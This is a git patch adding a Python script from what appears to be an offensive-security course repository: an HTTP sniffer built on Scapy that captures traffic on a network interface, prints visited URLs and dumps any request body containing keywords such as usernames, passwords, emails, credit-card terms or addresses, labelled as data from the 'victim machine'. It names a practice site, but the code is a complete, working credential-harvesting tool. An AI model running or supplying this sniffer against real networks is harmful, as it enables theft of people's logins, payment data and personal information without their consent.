From 4abbfdf26146e2d546b82f9927329d8c15acf1ea Mon Sep 17 00:00:00 2001 From: Manuel Vergara Date: Mon, 29 Jan 2024 19:28:10 +0100 Subject: [PATCH] Add sniffer scapy --- .../15_hacking/03_http_sniffer_scapy.py | 105 ++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 python-ofensivo/15_hacking/03_http_sniffer_scapy.py diff --git a/python-ofensivo/15_hacking/03_http_sniffer_scapy.py b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py new file mode 100644 index 0000000..2ec7e5e --- /dev/null +++ b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py @@ -0,0 +1,105 @@ +# /usr/bin/env python3 +""" +HTTP sniffer + +Práctica con testphp.vulnweb.com + +""" + +import argparse +import signal +import scapy.all as scapy +from scapy.layers import http + + +def def_handler(sig, frame): + + print("\n\n[!] Saliendo del programa...\n") + exit(1) + + +signal.signal(signal.SIGINT, def_handler) + + +def get_arguments(): + """ + Obtiene los argumentos de la línea de comandos + """ + + parser = argparse.ArgumentParser(description="DNS sniffer") + parser.add_argument( + "-i", "--interface", + required=True, dest="interface", + help="Interfaz de red a utilizar" + ) + args = parser.parse_args() + + return args + + +def process_sniffed_packet(packet): + """ + Procesa el paquete sniffado + """ + + cred_keywords = [ + "username", "user", "uname", "urname", "user_name", "usern" + "login", "password", "pass", + "mail", "email", "correo", + "phone", "telephone", "tel", "cellphone", "cell", "cel", "movil", + "credit", "card", "cc", "tarjeta", "credito", "debito", "debit", "ucc" + "address", "direccion", "dir", "street", "calle", "avenue", "av", + "location", "city", "country"] + + if packet.haslayer(http.HTTPRequest): + + url = "http://" + \ + packet[http.HTTPRequest].Host.decode() + \ + packet[http.HTTPRequest].Path.decode() + + print(f"[+] URL visitada: {url}") + + if packet.haslayer(scapy.Raw): + + try: + + response = packet[scapy.Raw].load.decode() + + for keyword in cred_keywords: + + if keyword in response: + + print(f"[+] Información comprometida: {response}") + break + + except: + + pass + + +def sniff(interface): + """ + Sniffing de paquetes + """ + + print("\n[+] Interceptando paquetes de la máquina victima: \n") + + scapy.sniff( + iface=interface, store=False, + prn=process_sniffed_packet + ) + + +def main(): + """ + Función principal + """ + + arguments = get_arguments() + + sniff(arguments.interface) + + +if __name__ == "__main__": + + main()